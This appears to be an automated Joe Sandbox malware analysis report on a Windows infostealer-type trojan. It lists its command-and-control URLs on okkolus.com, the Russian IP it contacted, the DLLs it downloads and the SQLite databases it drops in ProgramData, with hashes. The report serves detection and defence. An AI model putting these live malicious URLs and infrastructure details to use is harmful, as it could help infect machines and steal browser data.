                      NameMaliciousAntivirus DetectionReputation
                      http://okkolus.com/dfaf16606234b71d/softokn3.dlltrue
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.com/dfaf16606234b71d/mozglue.dlltrue
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.com/dfaf16606234b71d/freebl3.dlltrue
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.com/dfaf16606234b71d/vcruntime140.dlltrue
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.com/cf5cbdf706840b3f.phptrue
                      • 13%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dlltrue
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.com/dfaf16606234b71d/sqlite3.dlltrue
                      • 4%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.com/dfaf16606234b71d/nss3.dlltrue
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPhFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://okkolus.comFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmptrue
                      • 11%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabJEHIJDGI.0.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drfalse
                          		high
                          http://okkolus.com/dfaf16606234b71d/vcruntime140.dllataFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://okkolus.com/dfaf16606234b71d/msvcp140.dll.FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://okkolus.com/dfaf16606234b71d/nss3.dllllFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://okkolus.com/cf5cbdf706840b3f.FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://okkolus.com/dfaf16606234b71d/nss3.dll.UFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drfalse
                            		high
                            http://okkolus.com/dfaf16606234b71d/mozglue.dllrowserFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://okkolus.com/cf5cbdf706840b3f.php&)FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5ExtensionFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://okkolus.com/dfaf16606234b71d/mozglue.dllVUGFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_numberFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drfalse
                              		high
                              http://okkolus.com/dfaf16606234b71d/softokn3.dllerFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://okkolus.com/dfaf16606234b71d/nss3.dlleFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                              • 5%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://okkolus.com/dfaf16606234b71d/raFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sqlite.org/copyright.html.FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://okkolus.com/dfaf16606234b71d/msvcp140.dllerFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://okkolus.com/cf5cbdf706840b3f.phpNFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 4%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mozilla.com/en-US/blocklist/mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
                                  		high
                                  http://okkolus.com/dfaf16606234b71d/FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://okkolus.com/cf5cbdf706840b3f.phpte3.dllFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmpfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://okkolus.com/dfaf16606234b71d/softokn3.dll.FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://okkolus.com/dfaf16606234b71d/softokn3.dllCSFFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEHIJDGI.0.drfalse
                                    		high
                                    http://okkolus.com/dfaf16606234b71d/nss3.dllll_THFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponentFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://okkolus.com/dfaf16606234b71d/oTabFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://okkolus.com/dfaf16606234b71d/mozglue.dllserFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drfalse
                                      		high
                                      http://okkolus.com/dfaf16606234b71d/softFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cationsFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.ecosia.org/newtab/JEHIJDGI.0.drfalse
                                        		high
                                        http://okkolus.com/dfaf16606234b71d/nss3.dll9MFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://okkolus.comppDataFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=JEHIJDGI.0.drfalse
                                          		high
                                          https://ac.ecopnaclFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://okkolus.com/cf5cbdf706840b3f.php/MFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://okkolus.com/cf5cbdf706840b3f.phptFFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://okkolus.com/dfaf16606234b71d/nss3.dllJTFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://okkolus.com/dfaf16606234b71d/nss3.dlloUFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ac.ecopFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://okkolus.com/dfaf16606234b71d/mozglue.dlldFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://okkolus.com/dfaf16606234b71d/nss3.dllllxFFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=JEHIJDGI.0.drfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            31.41.44.147
                                            		okkolus.comRussian Federation
                                            		56577ASRELINKRUtrue

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1436574
                                            Start date and time:2024-05-06 02:51:03 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 8s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:FFAk2gixx5.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:14cd6d9cbad80b0e4076212bf7ad937f.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@1/18@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • HTTP Packets have been reduced
                                            • TCP Packets have been reduced to 100
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\CGDGHCBGDHJJKECAECBA

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.8553638852307782
                                            Encrypted:false
                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\DBFIDGII

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.1239949490932863
                                            Encrypted:false
                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                            MD5:271D5F995996735B01672CF227C81C17
                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\FCGIJKJJKEBGHJKFIDGCAAFCAF

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.6732424250451717
                                            Encrypted:false
                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\GHJJDGHCBGDHIECBGIDAEHCGDG

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.8508558324143882
                                            Encrypted:false
                                            SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                            MD5:933D6D14518371B212F36C3835794D75
                                            SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                            SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                            SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\JECBGCFHCFIDHIDHDGDG

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):51200
                                            Entropy (8bit):0.8745947603342119
                                            Encrypted:false
                                            SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                            MD5:378391FDB591852E472D99DC4BF837DA
                                            SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                            SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                            SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\JEHIJDGI

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):106496
                                            Entropy (8bit):1.136471148832945
                                            Encrypted:false
                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                            MD5:37B1FC046E4B29468721F797A2BB968D
                                            SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                            SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                            SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\freebl3.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):685392
                                            Entropy (8bit):6.872871740790978
                                            Encrypted:false
                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\mozglue.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):608080
                                            Entropy (8bit):6.833616094889818
                                            Encrypted:false
                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\msvcp140.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):450024
                                            Entropy (8bit):6.673992339875127
                                            Encrypted:false
                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                            C:\ProgramData\nss3.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1815519
                                            Entropy (8bit):6.634812314798213
                                            Encrypted:false
                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzo:J7Tf8J1Q+q
                                            MD5:7D191EE364B1851D2E42F34E609B9C20
                                            SHA1:8D2396AF483E19522D500984908F854D61A04A44
                                            SHA-256:724F186341F020B14781246C5CEB26962C18D322F4C96439EFA7BBE28D151DE7
                                            SHA-512:A1BC8DCDB1E64C000134440B122B898549B46C1F2E928C4DCC073AC3E04FD7B3D9375A7A87E900238749BFABDC17E1E4C7CF6644F1F37853D3696CB04C9ED78E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\softokn3.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):257872
                                            Entropy (8bit):6.727482641240852
                                            Encrypted:false
                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\vcruntime140.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):55296
                                            Entropy (8bit):6.558106649929844
                                            Encrypted:false
                                            SSDEEP:768:lK+3U7KL+LAPRycNr1gyIjFxv5ePM5et/jw1UgS05/w7uxgczc74BuRJNd6NRJ3M:lw2886xv555et/MCsjw0BuRK3jteoe
                                            MD5:ABE1198FEA554BA7456D12709E9C788D
                                            SHA1:1DE434DCFA780C88A75EC3502A9CE6363D05943B
                                            SHA-256:1776DF92E6C198A7360F1EB13ECAD1630DFA0655CB9E52C086EFB9503277C9F6
